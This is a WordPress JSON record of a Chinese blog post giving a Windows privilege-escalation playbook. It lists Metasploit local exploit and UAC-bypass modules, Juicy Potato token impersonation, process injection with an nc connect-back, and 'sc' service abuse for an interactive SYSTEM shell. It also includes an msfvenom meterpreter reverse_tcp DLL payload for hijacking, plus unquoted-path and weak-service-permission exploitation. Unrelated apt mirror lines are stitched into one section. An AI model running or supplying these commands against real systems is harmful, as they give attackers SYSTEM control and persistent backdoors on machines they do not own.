{"id":76,"date":"2024-04-05T10:00:00","date_gmt":"2023-05-25T02:00:00","guid":{"rendered":"http:\/\/123.207.45.199\/index.php\/2023\/05\/25\/%e6%9d%83%e9%99%90%e6%8f%90%e5%8d%87-windows\/"},"modified":"2026-05-31T21:58:43","modified_gmt":"2026-05-31T13:58:43","slug":"%e6%9d%83%e9%99%90%e6%8f%90%e5%8d%87-windows","status":"publish","type":"post","link":"https:\/\/www.redspear.cn\/index.php\/2024\/04\/05\/%e6%9d%83%e9%99%90%e6%8f%90%e5%8d%87-windows\/","title":{"rendered":"\u6743\u9650\u63d0\u5347-windows"},"content":{"rendered":"

ms16-070<\/p>\n

### \u603b\u7ed3<\/p>\n

\u6d41\u7a0b:<\/p>\n

\u9776\u673a=>\u4fe1\u606f\u6536\u96c6=>\u8d26\u6237=>\u8865\u4e01<\/p>\n

\u63d0\u6743\u65b9\u6cd5<\/p>\n

\u5de5\u5177<\/p>\n

MSF\u5168\u81ea\u52a8\t=> \t\u751f\u6210\u53cd\u5f39\u6728\u9a6c->\u76d1\u542c\u7aef\u53e3->\u7b5b\u9009exp\u6a21\u5757->use\u653b\u51fb\u6a21\u5757<\/p>\n

Cobalt Strike(cs)\t=> \u76d1\u542c\u7aef\u53e3->\u751f\u6210\u53cd\u5f39\u6728\u9a6c->\u70b9\u51fb\u63d0\u6743<\/p>\n

\u8fdb\u7a0b\u8fc1\u79fb\u63d0\u6743 => pinjector.exe\u5de5\u5177<\/p>\n

\u4ee4\u724c\u7a83\u53d6\u63d0\u6743=>msf \u76d1\u542c\u7aef\u53e3->potato.exe\u5de5\u5177(\u5229\u7528MS16_075\/\u70c2\u571f\u8c46 \u6f0f\u6d1e)\t<\/p>\n

\u547d\u4ee4<\/p>\n

at\t=>\t\u8ba1\u5212\u547d\u4ee4\uff0c\u53ef\u4ee5\u5728\u89c4\u5b9a\u65f6\u95f4\u5b8c\u6210\u4e00\u4e9b\u64cd\u4f5c<\/p>\n

sc\t=>\t\u9488\u5bf9\u670d\u52a1\t\u7528\u4e8e\u4e0e\u670d\u52a1\u63a7\u5236\u7ba1\u7406\u5668\u548c\u670d\u52a1\u8fdb\u884c\u901a\u4fe1\u7684\u547d\u4ee4\u884c\u7a0b\u5e8f create\tstart<\/p>\n

ps\t=>\t\u5fae\u8f6f\u63d2\u4ef6(\u9700\u4e0b\u8f7d)<\/p>\n

getsystem=>uac\u7ed5\u8fc7->msf ->search uac\t|| UACME\u5de5\u5177\/Akagi64.exe<\/p>\n

dll\u52ab\u6301=>\u706b\u7ed2\u5251\u5de5\u5177->.dll\u6587\u4ef6->\u5f00\u673a\u81ea\u542f\u52a8\u7a0b\u5e8f->\u5236\u4f5cdl\u6728\u9a6c\u4e0a\u4f20<\/p>\n

\u4e0d\u5e26\u5f15\u53f7\u7684\u4e0d\u5b89\u5168\u670d\u52a1=>jaws-enum.psl\u5de5\u5177 \u68c0\u6d4b->start sc \u670d\u52a1\u540d \u5229\u7528<\/p>\n

\u4e0d\u5b89\u5168\u7684\u670d\u52a1\u6743\u9650=>accesschk.exe\u5de5\u5177 \u68c0\u6d4b->\u914d\u7f6e->\u4e0a\u7ebf<\/p>\n

\u5e38\u7528\u547d\u4ee4<\/p>\n

![NrK5vZMgsN6aNS0Wzm4Tfw](image\/NrK5vZMgsN6aNS0Wzm4Tfw.png)<\/p>\n

1\u5f53\u524d\u6743\u9650\t whoami
\n2\u64cd\u4f5c\u7cfb\u7edf\u7248\u672c\uff08\u4f4d\u6570\uff09ver
\n3\u6f0f\u6d1e\u8865\u4e01\/\u6740\u8f6f\tsysteminfo
\n4\u7f51\u7edc\u8fde\u63a5\u72b6\u6001\ttasklist\/netstat -ano<\/p>\n

-\u300b\u540e\u53f0\u6743\u9650-\u300b\u7cfb\u7edf\u6743\u9650
\n-\u300bweb\u6743\u9650-\u300b\u7cfb\u7edf\u6743\u9650
\n-\u300b\u6570\u636e\u5e93-\u300b\u7cfb\u7edf\u6743\u9650
\n-\u300b\u4e2d\u95f4\u4ef6-\u300b\u7cfb\u7edf\u6743\u9650<\/p>\n

### 2.\u624b\u5de5\u63d0\u6743<\/p>\n

#### \u5224\u65ad<\/p>\n

\u5de5\u5177\u5224\u65ad<\/p>\n

~~~
\nhttps:\/\/github.com\/vulmon\/vulmap
\nhttps \/\/github.com\/bitsadmin\/wesng
\n*https \/\/github.com\/chroblert\/windowsvulnscan
\n~~~<\/p>\n

\u5728\u7ebf\u7f51\u7ad9<\/p>\n

~~~
\nhttps:\/\/i.hacking8.com\/tiquan
\n\u590d\u5236system
\n~~~<\/p>\n

#### EXP\u5229\u7528<\/p>\n

~~~
\nhttps \/\/github.com\/k8gege\/Ladon
\nhttps:\/\/github.com\/Ascotbe\/KernelHub
\nhttps:\/\/github.com\/nomi-sec\/PoC-in-GitHub
\nhttps \/\/github.com\/offensive-security\/exploitdb
\nhttp:\/\/cve.mitre.org\/data\/refs\/refmap\/source-MS.html
\n~~~<\/p>\n

### 3.MSF\u5168\u81ea\u52a8<\/p>\n

~~~
\n1.\u751f\u6210\u53cd\u5f39\u6728\u9a6c
\n2.\u76d1\u542c\u7aef\u53e3
\nbackground
\nsessions
\n3.\u7b5b\u9009EXP\u6a21\u5757
\n(\u534a\u81ea\u52a8\uff1a\u6839\u636e\u6f0f\u6d1e\u7f16\u53f7\u627e\u51fa\u7cfb\u7edf\u4e2d\u5b89\u88c5\u7684\u8865\u4e01)<\/p>\n

use post\/windows\/gather\/enum_patches
\nset sessions ?
\nrun<\/p>\n

(\u5168\u81ea\u52a8\uff1a\u5feb\u901f\u8bc6\u522b\u7cfb\u7edf\u4e2d\u53ef\u80fd\u88ab\u5229\u7528\u7684\u6f0f\u540c)
\nuse post\/multi\/recon\/local_exploit_suggester
\nset session ?
\nset showdescription true
\nrun<\/p>\n

\u8fd0\u884c\u653b\u51fb\u6a21\u5757use …
\nset session ?
\nrun
\n\u63d0\u6743\u7f6e system<\/p>\n

\u4f8b:
\nbackground
\nuse exploit\/windows\/local\/ms16_075_reflection_juicy
\nset session 1
\nexploit
\n~~~<\/p>\n

### 4.cs\u534a\u81ea\u52a8<\/p>\n

~~~
\nhttps:\/\/github.com\/k8gege\/Ladon
\nladon40 badpotato whoami
\n~~~<\/p>\n

deb http:\/\/mirrors.ustc.edu.cn\/kali kali-rolling main non-free contrib
\ndeb-src http:\/\/mirrors.ustc.edu.cn\/kali kali-rolling main non-free contrib<\/p>\n

#aliyuan kali gengxinyuan
\ndeb http:\/\/mirrors.aliyun.com\/kali kali-rolling main non-free contrib
\ndeb-src http:\/\/mirrors.aliyuncom\/kali kali-rolling main non-free contrib
\n#163 DEBIAN yuan
\ndeb http:\/\/mirrors.163.com\/debian wheezy main non-free contrib
\ndeb-src http:\/\/mirrors.163.com\/debian wheezy main non-free contrib
\ndeb http:\/\/mirrors.163.com\/debian wheezy-proposed-updates main non-free contrib
\ndeb-src http:\/\/mirrors.163.com\/debian wheezy-prioposed-updates main non-free contrib
\ndeb-src http:\/\/mirrors.163.com\/debian-security wheezy\/updates main non-free contri<\/p>\n

### 5.win->at\u547d\u4ee4\u63d0\u6743<\/p>\n

~~~
\nat\u547d\u4ee4\u662f\u4e00\u4e2a\u8ba1\u5212\u547d\u4ee4\uff0c\u53ef\u4ee5\u5728\u89c4\u5b9a\u65f6\u95f4\u5b8c\u6210\u4e00\u4e9b\u64cd\u4f5c\uff0c\u8fd9\u4e2a\u547d\u4ee4\u8c03\u7528system\u6743\u9650\u3002
\n\u9002\u7528\u7248\u672c\uff1a
\nWin2000&Win2003&XP\u4e2d\u8fd8\u662f\u5b58\u5728\u7684\uff0c\u5728Win7\u4ee5\u540e\u88ab\u5254\u9664.
\n\u63d0\u6743\u547d\u4ee4\uff1a
\nat 00:00 \/interactive cmd
\n(\u572800:00\u5206\u751f\u6210\u4e00\u4e2a\u4ea4\u4e92\u5f0f\u7684System\u6743\u9650\u7684cmd)
\n~~~<\/p>\n

### 6.win->sc\u547d\u4ee4\u63d0\u6743<\/p>\n

~~~
\nsc\u662f\u7528\u4e8e\u4e0e\u670d\u52a1\u63a7\u5236\u7ba1\u7406\u5668\u548c\u670d\u52a1\u8fdb\u884c\u901a\u4fe1\u7684\u547d\u4ee4\u884c\u7a0b\u5e8f\u3002\u63d0\u4f9b\u7684\u529f\u80fd\u7c7b\u4f3c\u4e8e\u63a7\u5236\u9762\u677f\u4e2d\u7ba1\u7406\u5de5\u5177.<\/p>\n

\u9002\u7528\u7248\u672c
\nwindows7\u30018\u30012003\u30012008\u3001(2012\u30012016\u53ef\u80fd\u4f1a\u5931\u8d25 7,8)
\n\u63d0\u6743\u547d\u4ee4<\/p>\n

\u521b\u5efa\u4e00\u4e2a\u540d\u53ebsyscmd\u7684\u65b0\u7684\u4ea4\u4e92\u5f0f\u7684cmd\u6267\u884c\u670d\u52a1
\nsc Create syscmd binPath=”cmd \/K start” type=own type=interact
\n\u8fd0\u884c\u670d\u52a1
\nsc start syscmd
\n~~~<\/p>\n

### 7.win->ps\u547d\u4ee4\u63d0\u6743<\/p>\n

\u4e0d\u662f\u7cfb\u7edf\u81ea\u5e26=>\u9700\u8981\u4e0b\u8f7d \u5fae\u8f6f<\/p>\n

~~~
\n\u9002\u7528\u7248\u672c
\nWin2008&win2012&win2016\u7b49
\n\u4e0a\u4f20PSEXEC.exe
\npsexec.exe -accepteula -s -i -d cmd
\n~~~<\/p>\n

### 8.win->\u8fdb\u7a0b\u8fc1\u79fb\u63d0\u6743<\/p>\n

\u624b\u52a8<\/p>\n

~~~
\n\u4e0a\u4f20 pinjector.exe
\npinjector -l\t\/\/\u67e5\u770b\u5177\u6709system\u6743\u9650\u7684pid
\npinjector -p pid cmd 1111\t\/\/pid\u4e3a\u6709system\u6743\u9650
\nnc \u9776\u673aip 1111
\n~~~<\/p>\n

\u81ea\u52a8<\/p>\n

~~~
\nmsf \u76d1\u542c
\nps \u67e5\u770b\u5177\u6709system\u6743\u9650\u7684pid
\nmigrate pid
\n~~~<\/p>\n

### 9.win->\u4ee4\u724c\u7a83\u53d6\u63d0\u6743<\/p>\n

win2008\/win2012\/\u963f\u91cc\u4e91\u670d\u52a1\u5668<\/p>\n

~~~
\nmsf \u76d1\u542c
\n~~~<\/p>\n

\u672c\u5730\u6743\u9650<\/p>\n

~~~
\nuse incognito
\nlist_tokens -u
\nimpersonate_token “NT AUTHORITY\\SYSTEM”
\n~~~<\/p>\n

web\u6743\u9650<\/p>\n

\u4ee4\u724c\u91cc\u6ca1\u6709system<\/p>\n

~~~
\n\u4e0a\u4f20potato.exe
\n execute -cH -f .\/potato.exe \/\/\u914d\u5408\u70c2\u58eb\u8c46\uff08\u539f\u7406\uff1a\u5229\u7528Ms16_075\u6f0f\u6d1e\uff09
\nuse incognito
\nlist_tokens -u
\nimpersonate_token “NT AUTHORITY\\SYSTEM”
\n~~~<\/p>\n

### 10.win->getsystem\u63d0\u6743<\/p>\n

~~~
\ngetsystem
\n~~~<\/p>\n

\u5b58\u5728uac<\/p>\n

~~~
\nuac\u4e00\u822c\u6307\u7528\u6237\u8d26\u6237\u63a7\u5236\u3002\u7528\u6237\u5e10\u6237\u63a7\u5236(User Account Control,\u7b80\u5199\u4f5cUAC)\u662f\u5fae\u8f6f\u516c\u53f8\u5728\u5176Windows Vista\u53ca\u66f4\u9ad8\u7248\u672c\u64cd\u4f5c\u7cfb\u7edf\u4e2d\u91c7\u7528\u7684\u4e00\u79cd\u63a7\u5236\u673a\u5236\u3002
\nmsconfig>\u5de5\u5177
\nUAC\u6709\u4e09\u4e2a\u6a21\u5f0f\u4f4e\u3001\u4e2d\u3001\u9ad8\u3002\u5f00\u542f\u4efb\u610f\u6a21\u5f0f\uff0cgetsystem\u547d\u4ee4\u5931\u6548\u3002\u56e0\u6b64\u9700\u8981\u7ed5\u8fc7
\n~~~<\/p>\n

uac\u7ed5\u8fc7<\/p>\n

~~~
\nmsf=>\u5b58\u5728\u6a21\u5757
\nsearch uac
\n\u4f7f\u7528bypassuac\u6a21\u5757
\nWin7 \u672c\u5730\u7535\u8111 \u672c\u5730\u6743\u9650
\nuse exploit\/windows\/local\/bypassuac<\/p>\n

win 10 \u672c\u5730\u7535\u8111 \u672c\u5730\u6743\u9650
\nuse exploit\/windows\/local\/ask\t\t\t\uff08\u76f8\u5f53\u4e8e\u9493\u9c7c\u3002\u7528\u4e8e\u6700\u9ad8\u7b49\u7ea7\uff09
\nuse exploit\/windows\/local\/bypassuac_sluihijack
\nuse exploit\/windows\/local\/bypassuac_silentcleanup
\n~~~<\/p>\n

UACME\u5de5\u5177<\/p>\n

\u7f16\u53f7 23 41 61<\/p>\n

~~~
\nmsf=>\u76d1\u542c
\nAkagi64.exe \u7f16\u53f7 \u6728\u9a6c\u7edd\u5bf9\u8def\u5f84
\ngetsystem
\n~~~<\/p>\n

### 11.dll\u52ab\u6301<\/p>\n

~~~<\/p>\n

\u5de5\u5177=>\u706b\u7ed2\u5251=>\u5bfb\u627e\u76ee\u6807 .dll\u6587\u4ef6\t=>\u5f00\u673a\u81ea\u542f\u52a8\u7a0b\u5e8f
\n\u5236\u4f5cdl\u6728\u9a6c\u4e0a\u4f20
\n\u5229\u7528\u706b\u7ed2\u5251\u8fdb\u884c\u8fdb\u7a0b\u5206\u6790\u52a0\u8f7dDLL,\u4e00\u822c\u7a0b\u5e8fDLL\u5229\u7528\u3002
\nmsfvenom -p windows\/meterpreter\/reverse_tcp lhost=192.168.156.148 lport=4444 -f dll > shell.dll
\n~~~<\/p>\n

### 12.win->\u4e0d\u5e26\u5f15\u53f7\u7684\u4e0d\u5b89\u5168\u670d\u52a1<\/p>\n

\u539f\u7406<\/p>\n

~~~
\n\u5373\u4f7f\u6b63\u786e\u5f15\u7528\u4e86\u670d\u52a1\u8def\u5f84\uff0c\u4e5f\u53ef\u80fd\u5b58\u5728\u5176\u4ed6\u6f0f\u6d1e\u3002\u7531\u4e8e\u7ba1\u7406\u914d\u7f6e\u9519\u8bef\uff0c\u7528\u6237\u53ef\u80fd\u5bf9\u670d\u52a1\u62e5\u6709\u8fc7\u591a\u7684\u6743\u9650\uff0c\u4f8b\u5982\uff0c\u53ef\u4ee5\u76f4\u63a5\u4fee\u6539\u5b83\u5bfc\u81f4\u91cd\u5b9a\u5411\u6267\u884c\u6587\u4ef6\u3002<\/p>\n

\u670d\u52a1\u540d\u79f0\uff1a\u4e3aC:\/AAX 86\/MM.EXE
\n\u6ca1\u6709\u53cc\u5f15\u53f7+\u8def\u5f84\u4e2d\u6709\u7a7a\u683c\u3002
\n\u6709\u5219\u8fd9\u662f\u4e0d\u5b89\u5168\u7684
\n\u53ef\u6784\u9020\u6728\u9a6c\u5373\u8def\u5f84\u4e3a\uff1aC:\/AA.exe
\n\u5982\u6b64\u4e0a\u9762\u670d\u52a1\u88ab\u8c03\u7528\u7684\u65f6\u5019\u4f1a\u8c03\u7528\u5230\u6211\u4eec\u7684\u6728\u9a6c\u7a0b\u5e8f
\n~~~<\/p>\n

\u68c0\u6d4b<\/p>\n

~~~
\n\u65b9\u5f0f\u4e00
\n1.msf\u4e0a\u7ebf+\u4e0a\u4f20jaws-enum.psl\u6587\u4ef6
\n2.\u8c03\u7528shell\u4e2d\u7684powershe11
\n3.\u6267\u884c\u6587\u4ef6.\\jaws-enum.psl<\/p>\n

\u65b9\u5f0f\u4e8c
\n\u68c0\u6d4b\u547d\u4ee4\uff1awmic service get name,displayname,pathname,startmode |findstr \/i “Auto” |findstr \/i \/v “C:\\Windows\\\\” |findstr \/i \/v “””
\n~~~<\/p>\n

\u5229\u7528<\/p>\n

~~~
\nsc start “\u670d\u52a1\u540d\u79f0”\t=>\u4e3b\u52a8\u4f7f\u7528 \u9700\u8981\u9ad8\u6743\u9650<\/p>\n

\u5f00\u542f\u81ea\u542f\t=>\u88ab\u52a8\u4f7f\u7528
\n~~~<\/p>\n

### 13.Win->\u4e0d\u5b89\u5168\u7684\u670d\u52a1\u6743\u9650<\/p>\n

\u68c0\u6d4b<\/p>\n

~~~
\n1.accesschk.exe -uwcqv “administrators” *
\n2.\u627e\u6743\u9650\u4e3a\u201cSERVICE_ALL_ACCESS\u201d\u7684\u670d\u52a1
\n3.\u914d\u7f6e sc config “vds” binpath=”C:\\1.exe
\n~~~<\/p>\n

\u4e0a\u7ebf<\/p>\n

“`
\nsc start vds \u624b\u52a8\u542f\u52a8\u4e0a\u7ebf\/\u6216\u8005\u7b49\u5f85\u670d\u52a1\u88ab\u8c03\u7528\u4e0a\u7ebf
\n“`<\/p>\n","protected":false},"excerpt":{"rendered":"

ms16-070 ### \u603b\u7ed3 \u6d41\u7a0b: \u9776\u673a=>\u4fe1\u606f\u6536\u96c6=>\u8d26\u6237=>\u8865\u4e01 \u63d0\u6743\u65b9\u6cd5 \u5de5\u5177 MSF\u5168\u81ea\u52a8 => … <\/p>\n","protected":false},"author":3,"featured_media":78,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-76","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-neiwang"],"_links":{"self":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/76","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/comments?post=76"}],"version-history":[{"count":1,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/76\/revisions"}],"predecessor-version":[{"id":139,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/posts\/76\/revisions\/139"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/media\/78"}],"wp:attachment":[{"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/media?parent=76"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/categories?post=76"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.redspear.cn\/index.php\/wp-json\/wp\/v2\/tags?post=76"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}